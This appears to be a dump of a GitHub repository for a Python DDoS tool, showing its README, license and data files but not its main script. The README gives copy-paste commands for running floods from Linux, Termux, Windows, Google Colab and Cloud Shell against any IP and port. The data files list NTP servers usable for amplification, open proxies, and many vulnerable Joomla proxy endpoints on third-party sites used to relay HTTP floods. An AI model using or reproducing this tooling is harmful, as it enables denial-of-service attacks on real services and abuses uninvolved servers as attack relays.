├── .gitignore ├── LICENSE ├── README.md ├── files ├── memcached_servers.txt ├── ntp_servers.txt ├── proxys │ ├── socket5.txt │ ├── socks5.txt │ └── useragent.txt ├── referers.txt └── useragent.txt ├── requirements.txt ├── run-termux.sh ├── run.bat ├── run.sh ├── socks5.txt └── start.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ddos_python3 2 | # You can ddos tcp by using Windows, Linux-Termux or Google Colab/Google Cloud Shell! 3 | 4 | ---- 5 | Requirements: `Windows 8+, Linux, Termux or Google Colab/Google Cloud Shell`, `Python3.9+`, `git` 6 | 7 | # On Linux 8 | 9 | 1. Clone this repository [Required git Package] 10 | 11 | ```bash 12 | sudo apt install git -y; sudo git clone https://github.com/KhanhNguyen9872/ddos_python3.git; sudo chmod -R 777 ddos_python3; cd ddos_python3 13 | ``` 14 | 2. Run ddos 15 | 16 | ```bash 17 | sudo bash ./run.sh 18 | ``` 19 | Insert IP, Port and waiting for few seconds, ddos will start! 20 | 21 | 22 | 23 | # On Termux 24 | 25 |  26 | 27 | 1. Download Termux APK (click on Picture): 28 | [](https://f-droid.org/repo/com.termux_118.apk) 29 | or 30 | [](https://github.com/KhanhNguyen9872/Ninja_Server_Termux/releases/download/NinjaServerTermuxv01/termux_0.118.apk) 31 | 32 | 1. Clone this repository [Required git Package] 33 | 34 | ```bash 35 | pkg install git -y && git clone https://github.com/KhanhNguyen9872/ddos_python3.git && chmod -R 777 ddos_python3 && cd ddos_python3 36 | ``` 37 | 2. Run ddos 38 | 39 | ```bash 40 | bash ./run-termux.sh 41 | ``` 42 | Insert IP, Port and waiting for few seconds, ddos will start! 43 | 44 | 45 | 46 | # On Windows 8 or up 47 | 48 |  49 | 50 | 1. Download this repository and Extract it! 51 | [Full Source Code](https://github.com/KhanhNguyen9872/ddos_python3/archive/refs/heads/main.zip) 52 | 53 | 2. Run ddos 54 | 55 | ``` 56 | Run 'run.bat' file 57 | ``` 58 | Insert IP, Port and waiting for few seconds, ddos will start! 59 | 60 | 61 | 62 | # On Google Colab [Recommend] 63 | 64 |  65 | 66 | 1. Full Code [Copy and Paste into Google Colab] 67 | ```bash 68 | !apt install git -y &> /dev/null 69 | !rm -rf * &> /dev/null 70 | !git clone https://github.com/KhanhNguyen9872/ddos_python3.git &> /dev/null 71 | !chmod -R 777 * &> /dev/null 72 | !mv ./ddos_python3/* ./ &> /dev/null 73 | !bash ./run.sh 74 | ``` 75 | Insert IP, Port and waiting for few seconds, ddos will start! 76 | 77 | 78 | 79 | # On Google Cloud Shell [Recommend] 80 | 81 |  82 | 83 | [Link Google Cloud Shell](https://shell.cloud.google.com/?show=ide%2Cterminal) 84 | 85 | 1. Clone this repository [Copy and Paste into Shell] 86 | ```bash 87 | rm -rf * &> /dev/null && git clone https://github.com/KhanhNguyen9872/ddos_python3.git &> /dev/null && chmod -R 777 * &> /dev/null && mv ./ddos_python3/* ./ &> /dev/null 88 | ``` 89 | 2. Run script 90 | ```bash 91 | bash ./run.sh 92 | ``` 93 | 3. If you get "Error when install requirements package!", run script again! 94 | ```bash 95 | bash ./run.sh 96 | ``` 97 | 98 | Insert IP, Port and waiting for few seconds, ddos will start! 99 | 100 | 101 | # Video Test http://18.141.194.31 102 | https://github.com/KhanhNguyen9872/ddos_python3/releases/download/video/2022-06-12.19-37-14.mp4 103 | 104 | -------------------------------------------------------------------------------- /files/ntp_servers.txt: -------------------------------------------------------------------------------- 1 | time.google.com 2 | time1.google.com 3 | time2.google.com 4 | time3.google.com 5 | time4.google.com 6 | time.cloudflare.com 7 | time.windows.com 8 | time.apple.com 9 | time.euro.apple.com 10 | clepsydra.dec.com/clepsydra.labs.hp.com/clepsydra.hpl.hp.com 11 | time-a-g.nist.gov 12 | time-b-g.nist.gov 13 | time-c-g.nist.gov 14 | time-d-g.nist.gov 15 | time-a-wwv.nist.gov 16 | time-b-wwv.nist.gov 17 | time-c-wwv.nist.gov 18 | time-d-wwv.nist.gov 19 | time-a-b.nist.gov 20 | time-b-b.nist.gov 21 | time-c-b.nist.gov 22 | time-d-b.nist.gov 23 | time.nist.gov 24 | utcnist.colorado.edu 25 | utcnist2.colorado.edu 26 | ntp1.vniiftri.ru 27 | ntp2.vniiftri.ru 28 | ntp3.vniiftri.ru 29 | ntp4.vniiftri.ru 30 | ntp1.niiftri.irkutsk.ru 31 | ntp2.niiftri.irkutsk.ru 32 | vniiftri.khv.ru 33 | vniiftri2.khv.ru 34 | ntp21.vniiftri.ru 35 | ntp.mobatime.ru 36 | ntp1.stratum1.ru 37 | ntp2.stratum1.ru 38 | ntp3.stratum1.ru 39 | ntp4.stratum1.ru 40 | ntp5.stratum1.ru 41 | ntp2.stratum2.ru 42 | ntp3.stratum2.ru 43 | ntp4.stratum2.ru 44 | ntp5.stratum2.ru 45 | stratum1.net 46 | ntp.ru 47 | ts1.aco.net 48 | ts2.aco.net 49 | ntp1.net.berkeley.edu 50 | ntp2.net.berkeley.edu 51 | ntp.gsu.edu 52 | tick.usask.ca 53 | tock.usask.ca 54 | ntp.nsu.ru 55 | ntp.rsu.edu.ru 56 | ntp.nict.jp 57 | clock.nyc.he.net 58 | clock.sjc.he.net 59 | ntp.fiord.ru 60 | gbg1.ntp.se 61 | gbg2.ntp.se 62 | mmo1.ntp.se 63 | mmo2.ntp.se 64 | sth1.ntp.se 65 | sth2.ntp.se 66 | svl1.ntp.se 67 | svl2.ntp.se 68 | ntp.se 69 | ntp.yycix.ca 70 | ntp.ix.ru 71 | time-a.as43289.net 72 | time-b.as43289.net 73 | time-c.as43289.net 74 | ntp.ripe.net 75 | clock.isc.org (prev ntp.isc.org) 76 | ntp.time.nl (ntp1.time.nl) 77 | ntp0.as34288.net 78 | ntp1.as34288.net 79 | ntp1.jst.mfeed.ad.jp 80 | ntp2.jst.mfeed.ad.jp 81 | ntp3.jst.mfeed.ad.jp 82 | pool.ntp.org 83 | 0.pool.ntp.org 84 | 1.pool.ntp.org 85 | 2.pool.ntp.org 86 | 3.pool.ntp.org 87 | europe.pool.ntp.org 88 | 0.europe.pool.ntp.org 89 | 1.europe.pool.ntp.org 90 | 2.europe.pool.ntp.org 91 | 3.europe.pool.ntp.org 92 | asia.pool.ntp.org 93 | 0.asia.pool.ntp.org 94 | 1.asia.pool.ntp.org 95 | 2.asia.pool.ntp.org 96 | 3.asia.pool.ntp.org 97 | ru.pool.ntp.org 98 | 0.ru.pool.ntp.org 99 | 1.ru.pool.ntp.org 100 | 2.ru.pool.ntp.org 101 | 3.ru.pool.ntp.org 102 | 0.gentoo.pool.ntp.org 103 | 1.gentoo.pool.ntp.org 104 | 2.gentoo.pool.ntp.org 105 | 3.gentoo.pool.ntp.org 106 | 0.arch.pool.ntp.org 107 | 1.arch.pool.ntp.org 108 | 2.arch.pool.ntp.org 109 | 3.arch.pool.ntp.org 110 | 0.fedora.pool.ntp.org 111 | 1.fedora.pool.ntp.org 112 | 2.fedora.pool.ntp.org 113 | 3.fedora.pool.ntp.org 114 | 0.opensuse.pool.ntp.org 115 | 1.opensuse.pool.ntp.org 116 | 2.opensuse.pool.ntp.org 117 | 3.opensuse.pool.ntp.org 118 | 0.centos.pool.ntp.org 119 | 1.centos.pool.ntp.org 120 | 2.centos.pool.ntp.org 121 | 3.centos.pool.ntp.org 122 | 0.debian.pool.ntp.org 123 | 1.debian.pool.ntp.org 124 | 2.debian.pool.ntp.org 125 | 3.debian.pool.ntp.org 126 | 0.askozia.pool.ntp.org 127 | 1.askozia.pool.ntp.org 128 | 2.askozia.pool.ntp.org 129 | 3.askozia.pool.ntp.org 130 | 0.freebsd.pool.ntp.org 131 | 1.freebsd.pool.ntp.org 132 | 2.freebsd.pool.ntp.org 133 | 3.freebsd.pool.ntp.org 134 | 0.netbsd.pool.ntp.org 135 | 1.netbsd.pool.ntp.org 136 | 2.netbsd.pool.ntp.org 137 | 3.netbsd.pool.ntp.org 138 | 0.openbsd.pool.ntp.org 139 | 1.openbsd.pool.ntp.org 140 | 2.openbsd.pool.ntp.org 141 | 3.openbsd.pool.ntp.org 142 | 0.dragonfly.pool.ntp.org 143 | 1.dragonfly.pool.ntp.org 144 | 2.dragonfly.pool.ntp.org 145 | 3.dragonfly.pool.ntp.org 146 | 0.pfsense.pool.ntp.org 147 | 1.pfsense.pool.ntp.org 148 | 2.pfsense.pool.ntp.org 149 | 3.pfsense.pool.ntp.org 150 | 0.opnsense.pool.ntp.org 151 | 1.opnsense.pool.ntp.org 152 | 2.opnsense.pool.ntp.org 153 | 3.opnsense.pool.ntp.org 154 | 0.amazon.pool.ntp.org 155 | 1.amazon.pool.ntp.org 156 | 2.amazon.pool.ntp.org 157 | 3.amazon.pool.ntp.org 158 | tick.usno.navy.mil 159 | tock.usno.navy.mil 160 | ntp2.usno.navy.mil 161 | utcnist2.colorado.edu 162 | timekeeper.isi.edu 163 | rackety.udel.edu 164 | mizbeaver.udel.edu 165 | otc1.psu.edu 166 | gnomon.cc.columbia.edu 167 | navobs1.gatech.edu 168 | navobs1.wustl.edu 169 | now.okstate.edu 170 | ntp.colby.edu 171 | ntp-s1.cise.ufl.edu 172 | ntpstm.netbone-digital.com 173 | nist1.symmetricom.com 174 | t2.timegps.net 175 | gps.layer42.net 176 | ntp-ca.stygium.net 177 | sesku.planeacion.net 178 | ntp0.nl.uu.net 179 | ntp1.nl.uu.net 180 | navobs1.oar.net 181 | ntp-galway.hea.net 182 | ntp1.ona.org 183 | time.fu-berlin.de 184 | atom.uhr.de 185 | ntps1-0.cs.tu-berlin.de 186 | ntps1-1.cs.tu-berlin.de 187 | ntps1-0.uni-erlangen.de 188 | ntps1-1.uni-erlangen.de 189 | ntp1.fau.de 190 | ntp2.fau.de 191 | ntp.dianacht.de 192 | zeit.fu-berlin.de 193 | ptbtime1.ptb.de 194 | ptbtime2.ptb.de 195 | rustime01.rus.uni-stuttgart.de 196 | rustime02.rus.uni-stuttgart.de 197 | chime1.surfnet.nl 198 | ntp.vsl.nl 199 | asynchronos.iiss.at 200 | ntp.nic.cz 201 | time.ufe.cz 202 | ntp.fizyka.umk.pl 203 | ntp1.usv.ro 204 | ntp3.usv.ro 205 | timehost.lysator.liu.se 206 | time1.stupi.se 207 | time.nrc.ca 208 | clock.uregina.ca 209 | cronos.cenam.mx 210 | ntp.lcf.mx 211 | hora.roa.es 212 | minuto.roa.es 213 | ntp1.inrim.it 214 | ntp2.inrim.it 215 | ntp1.oma.be 216 | ntp2.oma.be 217 | ntp.atomki.mta.hu 218 | ntp.i2t.ehu.eus 219 | ntp.neel.ch 220 | ntp.neu.edu.cn 221 | ntp.nict.jp 222 | ntps1.pads.ufrj.br 223 | ntp.shoa.cl 224 | time.esa.int 225 | time1.esa.int 226 | http://support.ntp.org/bin/view/Servers/StratumOneTimeServers 227 | http://support.ntp.org/bin/view/Servers/StratumTwoTimeServers 228 | http://support.ntp.org/bin/view/Servers/NTPPoolServers 229 | http://www.pool.ntp.org/zone/@ 230 | http://www.pool.ntp.org/zone/asia 231 | http://www.pool.ntp.org/zone/europe 232 | http://www.pool.ntp.org/zone/north-america 233 | http://www.pool.ntp.org/zone/oceania 234 | http://www.pool.ntp.org/zone/south-america 235 | https://time.nl/ 236 | https://time.nl/index_en.html 237 | -------------------------------------------------------------------------------- /files/proxys/socket5.txt: -------------------------------------------------------------------------------- 1 | 103.119.60.12:80 2 | 1.214.62.105:8000 3 | 1.214.62.103:8000 4 | 134.119.217.109:1080 5 | 134.119.217.108:1080 6 | 136.185.15.104:8080 7 | 139.162.32.187:8080 8 | 139.255.109.27:8080 9 | 186.3.9.219:999 10 | 41.161.92.138:8080 11 | 36.67.118.207:8080 12 | 85.195.86.228:1080 13 | 118.97.235.234:8080 14 | 154.79.242.178:1686 15 | 181.129.2.90:8081 16 | 85.195.86.236:1080 17 | 190.186.18.177:999 18 | 103.87.201.86:8080 19 | 59.66.142.35:7890 20 | 103.97.200.246:8090 21 | 190.187.201.26:8080 22 | -------------------------------------------------------------------------------- /files/proxys/socks5.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /files/proxys/useragent.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /files/referers.txt: -------------------------------------------------------------------------------- 1 | https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u= 2 | https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u= 3 | https://drive.google.com/viewerng/viewer?url= 4 | http://www.google.com/translate?u= 5 | https://developers.google.com/speed/pagespeed/insights/?url= 6 | http://help.baidu.com/searchResult?keywords= 7 | http://www.bing.com/search?q= 8 | https://add.my.yahoo.com/rss?url= 9 | https://play.google.com/store/search?q= 10 | http://www.google.com/?q= 11 | http://regex.info/exif.cgi?url= 12 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 13 | http://www.google.com/translate?u= 14 | http://translate.google.com/translate?u= 15 | http://validator.w3.org/feed/check.cgi?url= 16 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 17 | http://validator.w3.org/check?uri= 18 | http://jigsaw.w3.org/css-validator/validator?uri= 19 | http://validator.w3.org/checklink?uri= 20 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 21 | http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= 22 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 23 | http://validator.w3.org/mobile/check?docAddr= 24 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 25 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 26 | http://feedvalidator.org/check.cgi?url= 27 | http://gmodules.com/ig/creator?url= 28 | http://www.google.com/ig/adde?moduleurl= 29 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 30 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 31 | http://host-tracker.com/check_page/?furl= 32 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 33 | http://www.onlinewebcheck.com/check.php?url= 34 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 35 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 36 | http://about42.nl/www/showheaders.php;POST;about42.nl.txt 37 | http://browsershots.org;POST;browsershots.org.txt 38 | http://streamitwebseries.twww.tv/proxy.php?url= 39 | http://www.comicgeekspeak.com/proxy.php?url= 40 | http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= 41 | http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= 42 | http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= 43 | http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= 44 | http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= 45 | http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 46 | http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 47 | http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 48 | http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= 49 | http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= 50 | http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= 51 | http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= 52 | http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= 53 | http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= 54 | http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= 55 | http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= 56 | http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= 57 | http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= 58 | http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= 59 | http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= 60 | http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= 61 | http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 62 | http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 63 | http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= 64 | http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= 65 | http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 66 | http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= 67 | http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= 68 | http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= 69 | http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= 70 | http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= 71 | http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 72 | http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= 73 | http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 74 | http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 75 | http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= 76 | http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= 77 | http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= 78 | http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= 79 | http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 80 | http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= 81 | http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= 82 | http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 83 | http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= 84 | http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 85 | http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= 86 | http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= 87 | http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= 88 | http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= 89 | http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 90 | http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 91 | http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt 92 | http://web-sniffer.net/?url= 93 